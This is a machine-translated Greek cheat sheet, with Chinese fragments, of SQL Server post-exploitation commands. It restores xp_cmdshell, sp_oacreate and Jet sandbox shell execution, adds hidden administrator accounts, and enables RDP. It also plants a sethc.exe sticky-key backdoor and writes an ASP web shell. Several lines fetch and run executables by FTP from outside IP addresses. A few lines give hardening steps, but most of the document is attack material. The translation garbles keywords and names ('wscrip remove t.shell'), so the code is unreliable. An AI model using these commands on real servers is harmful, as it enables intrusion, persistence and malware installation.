1433 Εντολές επισκευής
net user SQLDebugger list /add net localgroup administrators SQLDebugger /add
Μήνυμα λάθους: Απέτυχε η εύρεση της αποθηκευμένης διαδικασίας 'master.. xp_cmdshell'。
Μέθοδος επισκευής: πολύ γενική, στην πραγματικότητα, άλλα 126 127 μπορούν να επισκευαστούν μαζί,
Εκτός xplog70.dll όλα τα άλλα μπορούν να διορθωθούν με αυτήν την εντολή
xp_cmdshell νέες μεθόδους ανάκτησης Βήμα 1: Διαγραφή: Διαδικασία πτώσης sp_addextendedproc Διαδικασία πτώσης sp_oacreate εκτελεστικός sp_dropextendedproc «xp_cmdshell» Διακομιστής: Μήνυμα 3701, Επίπεδο 11, Κατάσταση 5, Γραμμή 1 Δεν είναι δυνατή η κατάργηση της διαδικασίας 'sp_addextendedproc' επειδή δεν υπάρχει στον κατάλογο του συστήματος. Διακομιστής: Μήνυμα 3701, Επίπεδο 11, Κατάσταση 5, Διαδικασία sp_dropextendedproc, Γραμμή 18 Δεν είναι δυνατή η κατάργηση της διαδικασίας «xp_cmdshell» επειδή δεν υπάρχει στον κατάλογο του συστήματος. Βήμα 2 Ανάκτηση: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") Άμεση ανάκτηση, ανεξάρτητα από το αν υπάρχει sp_addextendedproc ή όχι
xplog70.dll διορθώσεις:
Μήνυμα λάθους: Δεν ήταν δυνατή η προσάρτηση του xplog70.dll DLL ή ενός από τα DLL που αναφέρονται από το DLL. Αιτία: 126 (Δεν είναι δυνατή η εύρεση της καθορισμένης λειτουργικής μονάδας.) )。
Επιδιόρθωση XPLOG70.DLL (πρώτα ελέγξτε τον κατάλογο αντιγράφων ασφαλείας \x86\bin με το αρχείο και, στη συνέχεια, αντικαταστήστε τον ακόλουθο κατάλογο)
Βήμα 1 εκτελεστικός sp_dropextendedproc «xp_cmdshell» Βήμα 2 dbcc addextendedproc ("xp_cmdshell","c:\sql2ksp4\x86\binn\xplog70.dll")
Απέτυχε η εύρεση της αποθηκευμένης διαδικασίας 'master.. xp_cmdshell'。 Βήμα 1: Διαδικασία δημιουργίας sp_addextendedproc --- 30/08/1996 20:13 @functname nvarchar(517),/* (ιδιοκτήτης.) Όνομα της συνάρτησης που θα καλέσετε
*/ @dllname varchar(255)/* όνομα της συνάρτησης που περιέχει DLL */ Όπως Απενεργοποιήστε implicit_transactions αν @@trancount > 0 αρχίζω raiserror(15002,-1,-1,'sp_addextendedproc') Επιστροφή (1) Τέλος dbcc addextendedproc( @functname, @dllname) επιστροφή (0) -- sp_addextendedproc ΠΗΓΑΙΝΩ
Βήμα 2: EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'δηλώστε @o int
Ο SQL Server απέκλεισε την πρόσβαση στη διεργασία 'sys.xp_cmdshell' του στοιχείου 'xp_cmdshell', επειδή αυτό το στοιχείο τερματίστηκε ως μέρος της ρύθμισης παραμέτρων ασφαλείας για αυτόν το διακομιστή. Οι διαχειριστές συστήματος μπορούν να ενεργοποιήσουν το "xp_cmdshell" χρησιμοποιώντας sp_configure. Για περισσότερες πληροφορίες σχετικά με την ενεργοποίηση xp_cmdshell, ανατρέξτε στο θέμα Διαμόρφωση περιφερειακών εφαρμογών στη σειρά βιβλίων SQL Server Online.
; EXEC sp_configure «εμφάνιση σύνθετων επιλογών», 1 -- ; ΕΠΑΝΑΔΙΑΜΌΡΦΩΣΗ ΜΕ ΠΑΡΆΚΑΜΨΗ -- ; EXEC sp_configure 'xp_cmdshell', 1 -- ; ΕΠΑΝΑΔΙΑΜΌΡΦΩΣΗ ΜΕ ΠΑΡΆΚΑΜΨΗ -- ; EXEC sp_configure 'εμφάνιση σύνθετων επιλογών', 0 --
Καταργήστε τον επικίνδυνο χώρο αποθήκευσης SQL: ΔΙΑΔΙΚΑΣΙΑ ΑΠΟΡΡΙΨΗΣ sp_makewebtask εκτελεστικός πλοίαρχος.. sp_dropextendedproc xp_cmdshell εκτελεστικός πλοίαρχος.. sp_dropextendedproc xp_dirtree εκτελεστικός πλοίαρχος.. sp_dropextendedproc xp_fileexist εκτελεστικός πλοίαρχος.. sp_dropextendedproc xp_terminate_process εκτελεστικός πλοίαρχος.. sp_dropextendedproc sp_oamethod εκτελεστικός πλοίαρχος.. sp_dropextendedproc sp_oacreate εκτελεστικός πλοίαρχος.. sp_dropextendedproc xp_regaddmultistring εκτελεστικός πλοίαρχος.. sp_dropextendedproc xp_regdeletekey εκτελεστικός πλοίαρχος.. sp_dropextendedproc xp_regdeletevalue εκτελεστικός πλοίαρχος.. sp_dropextendedproc xp_regenumkeys εκτελεστικός πλοίαρχος.. sp_dropextendedproc xp_regenumvalues εκτελεστικός πλοίαρχος.. sp_dropextendedproc sp_add_job εκτελεστικός πλοίαρχος.. sp_dropextendedproc sp_addtask εκτελεστικός πλοίαρχος.. sp_dropextendedproc xp_regread εκτελεστικός πλοίαρχος.. sp_dropextendedproc xp_regwrite εκτελεστικός πλοίαρχος.. sp_dropextendedproc xp_readwebtask εκτελεστικός πλοίαρχος.. sp_dropextendedproc xp_makewebtask εκτελεστικός πλοίαρχος.. sp_dropextendedproc xp_regremovemultistring εκτελεστικός πλοίαρχος.. sp_dropextendedproc sp_OACreate ΔΙΑΔΙΚΑΣΙΑ ΠΤΩΣΗΣ sp_addextendedproc
Επαναφορά εκτεταμένων αποθηκευμένων διαδικασιών Επαναφέρετε το sp_addextendedproc πρώτα, η δήλωση έχει ως εξής: Πρώτα: Διαδικασία δημιουργίας sp_addextendedproc --- 30/08/1996 20:13 @functname nvarchar(517),/* (ιδιοκτήτης.) όνομα συνάρτησης για κλήση */ @dllname varchar(255)/* όνομα DLL που περιέχει συνάρτηση */ ως Απενεργοποιήστε implicit_transactions αν @@trancount > 0 αρχίζω raiserror(15002,-1,-1,'sp_addextendedproc') Επιστροφή (1) Τέλος dbcc addextendedproc( @functname, @dllname) επιστροφή (0) -- sp_addextendedproc ΠΗΓΑΙΝΩ
Δεύτερος: Χρησιμοποιήστε το Master εκτελεστικός sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll' εκτελεστικός sp_addextendedproc xp_dirtree,'xpstar.dll' εκτελεστικός sp_addextendedproc xp_enumgroups,'xplog70.dll' εκτελεστικό sp_addextendedproc xp_fixeddrives,'xpstar.dll' εκτελεστικό sp_addextendedproc xp_loginconfig,'xplog70.dll' εκτελεστικό sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' εκτελεστικό sp_addextendedproc xp_getfiledetails,'xpstar.dll' εκτελεστικός sp_addextendedproc sp_OACreate,'odsole70.dll' εκτελεστικός sp_addextendedproc sp_OADestroy,'odsole70.dll' εκτελεστικός sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' εκτελεστικός sp_addextendedproc sp_OAGetProperty,'odsole70.dll' εκτελεστικός sp_addextendedproc sp_OAMethod,'odsole70.dll' εκτελεστικός sp_addextendedproc sp_OASetProperty,'odsole70.dll' εκτελεστικό sp_addextendedproc sp_OAStop,'odsole70.dll' εκτελεστικός sp_addextendedproc xp_regaddmultistring,'xpstar.dll' εκτελεστικός sp_addextendedproc xp_regdeletekey,'xpstar.dll' εκτελεστικό sp_addextendedproc xp_regdeletevalue,'xpstar.dll' εκτελεστικός sp_addextendedproc xp_regenumvalues,'xpstar.dll' εκτελεστικό sp_addextendedproc xp_regread,'xpstar.dll' εκτελεστικός sp_addextendedproc xp_regremovemultistring,'xpstar.dll' εκτελεστικός sp_addextendedproc xp_regwrite,'xpstar.dll' εκτελεστικός sp_addextendedproc xp_availablemedia,'xpstar.dll'
Διαγράψτε την πρόταση που επεκτείνει την αποθηκευμένη διαδικασία xp_cmdshell: εκτελεστικός sp_dropextendedproc «xp_cmdshell»
Ανακτήστε την πρόταση sql του cmdshell exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Άνοιγμα της πρότασης cmdshell SQL exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Προσδιορίστε εάν υπάρχει επέκταση χώρου αποθήκευσης επιλέξτε count(*) από το master.dbo.sysobjects όπου xtype='x' και name='xp_cmdshell' Το αποτέλεσμα επιστροφής είναι 1 και είναι εντάξει
Επαναφορά xp_cmdshell exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll'; επιλέξτε count(*) από το master.dbo.sysobjects όπου xtype='x' και name='xp_cmdshell' Το αποτέλεσμα επιστροφής είναι 1 και είναι εντάξει Διαφορετικά, ανεβάστε xplog7.0.dll exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
Αποκλεισμός της δήλωσης sql του cmdshell sp_dropextendedproc "xp_cmdshell
Ένα. Αλλαγή της μεθόδου κωδικού πρόσβασης SA: Αφού συνδεθείτε με το SQL Comprehensive Utilization Tool, εκτελέστε την εντολή: exec sp_password NULL, 'νέος κωδικός πρόσβασης', 'sa' (Υπόδειξη: χρησιμοποιήστε με προσοχή!)
Δύο. Απλώς επιδιορθώστε τον αδύναμο κωδικό πρόσβασης.
Μέθοδος 1: Ρωτήστε τον διαχωριστή μετά τη σύνδεση: αν υπάρχει (επιλέξτε * από dbo.sysobjects όπου id = object_id(N'[dbo].[ xp_cmdshell]') και OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo]. [xp_cmdshell]»
ΠΗΓΑΙΝΩ Στη συνέχεια, πατήστε το πλήκτρο F5 για να εκτελέσετε την εντολή
Μέθοδος 2: Ερώτημα μετά τη σύνδεση του διαχωριστή Το πρώτο βήμα είναι να εκτελέσετε: χρησιμοποιήστε το master Βήμα 2: sp_dropextendedproc «xp_cmdshell» Στη συνέχεια, πατήστε το πλήκτρο F5 για να εκτελέσετε την εντολή
Δεν είναι δυνατή η προσάρτηση του xpsql70.dll DLL ή ενός από τα DLL που αναφέρονται από το DLL. Λόγος 126 (Δεν είναι δυνατή η εύρεση της καθορισμένης μονάδας. ) Μέθοδος ανάκτησης: Αφού ρωτήσετε τη σύνδεση του διαχωριστή, Βήμα 1: sp_dropextendedproc "xp_cmdshell" Βήμα 2: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
Η συνάρτηση xp_cmdshell δεν μπορεί να βρεθεί στο xpweb70.dll της βιβλιοθήκης. Αιτία: 127 (Δεν είναι δυνατή η εύρεση του καθορισμένου προγράμματος.) ) Μέθοδος ανάκτησης: Αφού ρωτήσετε τη σύνδεση του διαχωριστή, Βήμα 1 Εκτέλεση: exec sp_dropextendedproc 'xp_cmdshell' Βήμα 2: exec sp_addextendedproc 'xp_cmdshell', 'xpweb70.dll' Στη συνέχεια, πατήστε το πλήκτρο F5 για να εκτελέσετε την εντολή
Εάν καμία από τις παραπάνω μεθόδους δεν είναι ανακτήσιμη, δοκιμάστε να προσθέσετε τον λογαριασμό απευθείας χρησιμοποιώντας τις ακόλουθες μεθόδους: Αφού ρωτήσετε τη σύνδεση του διαχωριστή, Σύστημα 2000servser: δηλώστε @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user Web hacker /add'
δηλώστε @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators Web /add'
XP ή 2003Σύστημα διακομιστή: Σφάλμα 126! Παραγγελία
δηλώστε @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user Web$ hacker /add'
δηλώστε @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators Web$ /add'
C:\>DIR C:\ Ο SQL Server απέκλεισε την πρόσβαση στη διεργασία 'sys.xp_cmdshell' του στοιχείου 'xp_cmdshell', επειδή αυτό το στοιχείο τερματίστηκε ως μέρος της ρύθμισης παραμέτρων ασφαλείας για αυτόν το διακομιστή. Οι διαχειριστές συστήματος μπορούν να ενεργοποιήσουν το "xp_cmdshell" χρησιμοποιώντας sp_configure. Για περισσότερες πληροφορίες σχετικά με την ενεργοποίηση xp_cmdshell, ανατρέξτε στο θέμα Διαμόρφωση περιφερειακών εφαρμογών στη σειρά βιβλίων SQL Server Online.
Δηλώσεις που εκτελούνται από τον αναλυτή:
EXEC sp_configure «εμφάνιση σύνθετων επιλογών», 1; ΕΠΑΝΑΔΙΑΜΌΡΦΩΣΗ; EXEC sp_configure 'xp_cmdshell', 1; ΕΠΑΝΑΔΙΑΜΌΡΦΩΣΗ;
Μερικές φορές, κατά την εκτέλεση των παραπάνω δηλώσεων με σύνδεση αποσπαστή ερωτήματος, η αποθηκευμένη διαδικασία δεν μπορεί να βρεθεί sp_addextendedproc
Λύση:
Διαδικασία δημιουργίας sp_addextendedproc --- 30/08/1996 20:13 @functname nvarchar(517),/* (ιδιοκτήτης.) Όνομα συνάρτησης προς κλήση */ @dllname varchar(255)/* όνομα της συνάρτησης που περιέχει DLL */ Όπως Απενεργοποιήστε implicit_transactions αν @@trancount > 0 αρχίζω raiserror(15002,-1,-1,'sp_addextendedproc') Επιστροφή (1) Τέλος dbcc addextendedproc( @functname, @dllname) επιστροφή (0) -- sp_addextendedproc ΠΗΓΑΙΝΩ Αυτός ο κώδικας επικολλάται στον διαχωριστή ερωτημάτων και εκτελείται
Εξερευνητής:
c:\windows\explorer.exe
Δείτε τον πίνακα περιεχομένων exec master.dbo.xp_subdirs 'c:\' Λίστα δίσκων εκτελεστικός πλοίαρχος.. xp_fixeddrives
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 直接加帐号!
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0 Επιλέξτε * Από το OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Βάση δεδομένων=c:\windows\system32\ias\ias.mdb','select shell("καθαρός χρήστης 123 123 /add")'); Επιλέξτε * Από το OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Βάση δεδομένων=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
echo Επεξεργαστής Μητρώου των Windows Έκδοση 5.00 >3389.reg ηχώ. >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg echo "Enabled"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg echo "ShutdownWithoutLogon"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg echo "TSEnabled"=dword:00000001 >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg echo "Έναρξη"=dword:00000002 >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg echo "Έναρξη"=dword:00000002 >>3389.reg ηχώ [HKEY_USERS\. DEFAULT\Διάταξη πληκτρολογίου\Εναλλαγή] >>3389.reg echo "Πλήκτρο συντόμευσης"="1" >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg echo "PortNumber"=dword:00000D3D >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg echo "PortNumber"=dword:00000D3D >>3389.reg regedit /s 3389.reg
Ανοίξτε το 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0; --
Πάσο 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;
Αναχώρηση θύρας 3389
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Κανονική πίσω πόρτα CMD xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
Το win2K πηγαίνει απευθείας στο PS Mar εκτελεστικός πλοίαρχος.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 Επιλέξτε * από το openrowset('microsoft.jet.oledb.4.0','; database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo αντίο>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
win03-XP απευθείας σε άλογα PS εκτελεστικός πλοίαρχος.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 Επιλέξτε * από το openrowset('microsoft.jet.oledb.4.0','; database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo αντίο>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
5. Αλλάξτε την εντολή backdoor δηλώστε @o int exec sp_oacreate 'scrip remove ting.filesystemobject', @o έξω exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
δηλώστε @o int exec sp_oacreate 'scrip remove ting.filesystemobject', @o έξω exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
Αντιγραφή C:\Windows\explorer.exe C:\Windows\System32\sethc.exe Αντιγραφή C:\Windows\System32\sethc.exe C:\Windows\System32\DLLCACHE\sethc.exe
δηλώστε @o int exec sp_oacreate 'wscrip remove t.shell', @o out exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX είναι η εντολή που θέλετε να εκτελέσετε
Γράψτε την τιμή που καθορίζεται στο κλειδί που καθορίζεται στο μητρώο), χρησιμοποιώντας τη μέθοδο (γράψτε bbb στο κλειδί HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue):
EXEC master.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='ΛΟΓΙΣΜΙΚΌ\aaa',
@value_name='aaaValue',
@type='REG_SZ',
@value='bbb'
@echo open 121.22.56.5>c:\bin.txt&@echo list>>c:\bin.txt&@echo list>>c:\bin.txt&@echo get gzn.exe>>c:\bin.txt&@echo bye>>c:\bin.txt&@ftp -s:c:\bin.txt&del c:\bin.txt&gzn.exe& gzn.exe&gzn.exe
Αρχικά, αντιγράψτε ftp.exe στον κατάλογο wmpub @echo cd c:\wmpub\>c:\wmpub\in.bat&@echo ftp -s:c:\wmpub\xiuxiu.txt>>c:\wmpub\in.bat
Άνοιγμα 3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators IUSR_SERVER /add
Η SQL γράφει μια πρόταση exec master.dbo.xp_subdirs 'd:\web\cdlxkj'; exec sp_makewebtask 'd:\web\cdlxkj\XX.asp','select''<%execute(request("SB"))%>'' '
Προώθηση λειτουργίας SA Sandbox ----- ---------------------- εκτελεστικός πλοίαρχος.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0; ------------------------------------------------------- Επιλέξτε * Από το OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Βάση δεδομένων=c:\windows\system32\ias\ias.mdb','select shell("καθαρός χρήστης sql$ 123 /add")'); ------------------------------------------------------- Επιλέξτε * Από το OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Βάση δεδομένων=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');
3389 ΜΕΤΑΤΌΠΙΣΗ
Η πρόταση που χρησιμοποιήθηκε: Εισβολή EXEC master.. xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. ΕΞΕ», @value_name='Πρόγραμμα εντοπισμού σφαλμάτων', @type='REG_SZ', @value='C:\WINDOWS\explorer.exe'
Ανάκτηση EXEC master.. xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. ΕΞΕ», @value_name='Πρόγραμμα εντοπισμού σφαλμάτων', @type='REG_SZ', @value=''
Πειρατεία εικόνας
EXEC master.. xp_regwrite --- αυτό είναι επεξεργασία μητρώου! @rootkey='HKEY_LOCAL_MACHINE', ---Αυτή είναι η θέση! @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE», -----Αυτή είναι και η θέση! @value_name='Debugger', --- αυτό είναι το όνομα του πίνακα! @type='REG_SZ', --- εδώ είναι η έννοια της γραφής! @value='C:\WINDOWS\explorer.exe' ---- εδώ είναι το γραπτό περιεχόμενο!
Η όλη διαδικασία είναι να χρησιμοποιήσετε τον κύριο: xp_regwrite γίνει αυτό το στοιχείο,
1.sql εντολή για να ρωτήσετε εάν το σταθερό κλειδί μητρώου έχει παραβιαστεί
εκτελεστικός πλοίαρχος.. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2.sql εντολή παραβιάζει τη λειτουργία του αυτοκόλλητου κλειδιού μητρώου και την αντικαθιστά με τη διαχείριση εργασιών (φυσικά μπορείτε να την αντικαταστήσετε με άλλες εντολές που θέλετε)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 'Πρόγραμμα εντοπισμού σφαλμάτων','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3.sql εντολή για την κατάργηση της δυνατότητας πειρατείας του σταθερού κλειδιού μητρώου προστατεύει τον διακομιστή σας από την εκμετάλλευση από άλλους
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
αρχεία εγγραφής SQL
δηλώστε @o int, @f int, @t int @ret int exec sp_oacreate 'scrip remove ting.filesystemobject', @o έξω exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("Wscrip remove t.NETWORK")' exec @ret = sp_oamethod @f, 'γραμμή εγγραφής', NULL,'os="WinNT://"&wsnetwork. ΌνομαΥπολογιστή' exec @ret = sp_oamethod @f, 'γραμμή εγγραφής', NULL,'Set ob=GetObject(os)' exec @ret = sp_oamethod @f, 'γραμμή εγγραφής', NULL,'Set oe=GetObject(os&"/Administrators,group")' exec @ret = sp_oamethod @f, 'γραμμή εγγραφής', NULL,'Set od=ob. Δημιουργία("χρήστης","δοκιμή")' exec @ret = sp_oamethod @f, 'γραμμή εγγραφής', NULL,'od. SetPassword "1234"' exec @ret = sp_oamethod @f, 'γραμμή εγγραφής', NULL,'od. SetInfo ' exec @ret = sp_oamethod @f, 'γραμμή εγγραφής', NULL,'Set of=GetObject(os&"/test",χρήστης) ' exec @ret = sp_oamethod @f, 'γραμμή εγγραφής', NULL,'oe.add os&"/test"'
Δέσμες ενεργειών χωρίς κλιμάκωση NET
struser=wscrip για να αφαιρέσετε το t.arguments(0) strpass=wscrip για να αφαιρέσετε το t.arguments(1)
set lp=createObject("Wscrip remove t.NETWORK") oz="WinNT://"&lp. ΌνομαΥπολογιστή Ορισμός ob=GetObject(oz) Set oe=GetObject(oz&"/Administrators,group") Ορισμός od=ob.create("χρήστης",struser) οδ. SetPassword strpass οδ. Πληροφορίες συνόλου Set of=GetObject(oz&"/" & struser & ",user") οε. Προσθήκη(από. ADsPath)
Για κάθε διαχειριστή στο oe. Μέλη αν struser=admin. Ονομάστε τότε Το Wscrip αφαίρεσε το t.echo struser & "Ιδρύθηκε με επιτυχία!" wscrip για να αφαιρέσετε το t.quit τέλος αν Επόμενο
Το Wscrip αφαιρεί το t.echo struser & "Η εγκατάσταση χρήστη απέτυχε!" Αποθηκεύστε τα παραπάνω ως χρήστης. Αρχείο VBS Στη συνέχεια, εκτελέστε: cscrip για να αφαιρέσετε τον κωδικό πρόσβασης ονόματος χρήστη user.vbs
Χρησιμοποιώντας τη λειτουργία προστατευμένης εκτέλεσης JET, μπορείτε να επιλύσετε τα προβλήματα που προκαλούνται από αποθηκευμένες διαδικασίες, όπως XP_cmdshell και σχετικές βιβλιοθήκες δυναμικής σύνδεσης. Για λόγους ασφαλείας, το σύστημα δεν ενεργοποιεί τη λειτουργία sandbox από προεπιλογή, κάτι που απαιτεί από xp_regwrite να ενεργοποιήσετε τη λειτουργία sandbox:
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0 \Μηχανές','SandBoxMode','REG_DWORD',1
Στη συνέχεια, εκτελέστε την εντολή sandbox για να προσθέσετε έναν χρήστη με το όνομα test με τον κωδικό πρόσβασης 1234 στο σύστημα:
Επιλέξτε * από το openrowset('microsoft.jet.oledb.4.0','; βάση δεδομένων=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c δοκιμή καθαρού χρήστη 1234 /add")')
Επιλέξτε * από το openrowset('microsoft.jet.oledb.4.0','; βάση δεδομένων=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators test /add")')
Διαφορετικά λειτουργικά συστήματα έχουν διαφορετικές διαδρομές και πρέπει να τροποποιηθούν ανάλογα με την κατάσταση:
NT/2K: c:\winnt\system32\ XP/2003: c:\windows\system32\
Επιπλέον, στον Microsoft SQL Server 2005, ορισμένες αποθηκευμένες διαδικασίες κλείνουν από προεπιλογή και απαιτούν εντολές για να ανοίξουν:
Ενεργοποιήστε XP_cmdshell:
EXEC sp_configure «εμφάνιση σύνθετων επιλογών», 1; ΕΠΑΝΑΔΙΑΜΌΡΦΩΣΗ; ΣΤΕΛΕΧΟΣ sp_configure «xp_cmdshell», 1· ΕΠΑΝΑΔΙΑΜΌΡΦΩΣΗ;
Ανοίξτε το 'OPENROWSET':
exec sp_configure «εμφάνιση σύνθετων επιλογών», 1; ΕΠΑΝΑΔΙΑΜΌΡΦΩΣΗ; εκτελεστικό sp_configure «Ad hoc κατανεμημένα ερωτήματα»,1· ΕΠΑΝΑΔΙΑΜΌΡΦΩΣΗ;
Ενεργοποιήστε το "sp_oacreate":
exec sp_configure «εμφάνιση σύνθετων επιλογών», 1; ΕΠΑΝΑΔΙΑΜΌΡΦΩΣΗ; εκτελεστικό sp_configure «Διαδικασίες αυτοματισμού Ole»,1· ΕΠΑΝΑΔΙΑΜΌΡΦΩΣΗ;
Ακολουθούν μερικές περιπτώσεις όπου η εντολή εκτέλεσης κάτω από το sa είναι λάθος: 1. Δεν είναι δυνατή η φόρτωση του xpsql70.dll DLL ή ενός DLL που αναφέρεται από το DLL. Λόγος 126 (Δεν είναι δυνατή η εύρεση της καθορισμένης μονάδας. ) Αυτή η κατάσταση είναι σχετικά συνηθισμένη και η επισκευή είναι απλή και απλή, αλλά υπάρχουν προϋποθέσεις. Εάν μπορείτε να καταχωρίσετε τον κατάλογο σε αυτήν την περίπτωση (με το sqltools v2.0 υπάρχει μια λειτουργία καταλόγου) Συγχαρητήρια για αυτήν την κατάσταση 80% μπορεί να διορθωθεί, εάν μπορείτε να καταχωρίσετε τον κατάλογο, τότε απλώς βρείτε τη διαδρομή xplog70.dll και εκτελέστε την ακόλουθη εντολή. Βήμα 1 exec sp_dropextendedproc 'xp_cmdshell' (αυτή η εντολή είναι να διαγράψετε το αρχικό cmdshell, επειδή έχει ήδη πάει στραβά) Βήμα 2 dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll") ; EXEC sp_configure «εμφάνιση σύνθετων επιλογών», 0 – Φυσικά αυτή είναι μια εντολή sql, που εκτελείται με έναν αναλυτή ερωτημάτων. Το c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll στο δεύτερο βήμα είναι η διαδρομή του xplog70.dll, αυτή η διαδρομή είναι σχετικά κοινή, εάν η μονάδα δίσκου c δεν την έχει, μπορείτε να βρείτε άλλα γράμματα μονάδας δίσκου. 2. Δεν είναι δυνατή η εύρεση της συνάρτησης xp_cmdshell στη βιβλιοθήκη xpweb70.dll. Αιτία: 127 (Δεν είναι δυνατή η εύρεση του καθορισμένου προγράμματος.) ) Στην πραγματικότητα, αυτό είναι το ίδιο με το παραπάνω 126, δηλαδή το cmdshell είναι λάθος, αρκεί να βρείτε το αντίγραφο ασφαλείας xplog70.dll να ακολουθήσετε την παραπάνω μέθοδο για να το διορθώσετε. 3. Αποτυχία εύρεσης της αποθηκευμένης διαδικασίας «κύριος». xpcmdshell' Σε αυτήν την περίπτωση, βλέπω στο Διαδίκτυο ότι η μέθοδος είναι: Βήμα 1: Διαγραφή: Διαδικασία πτώσης 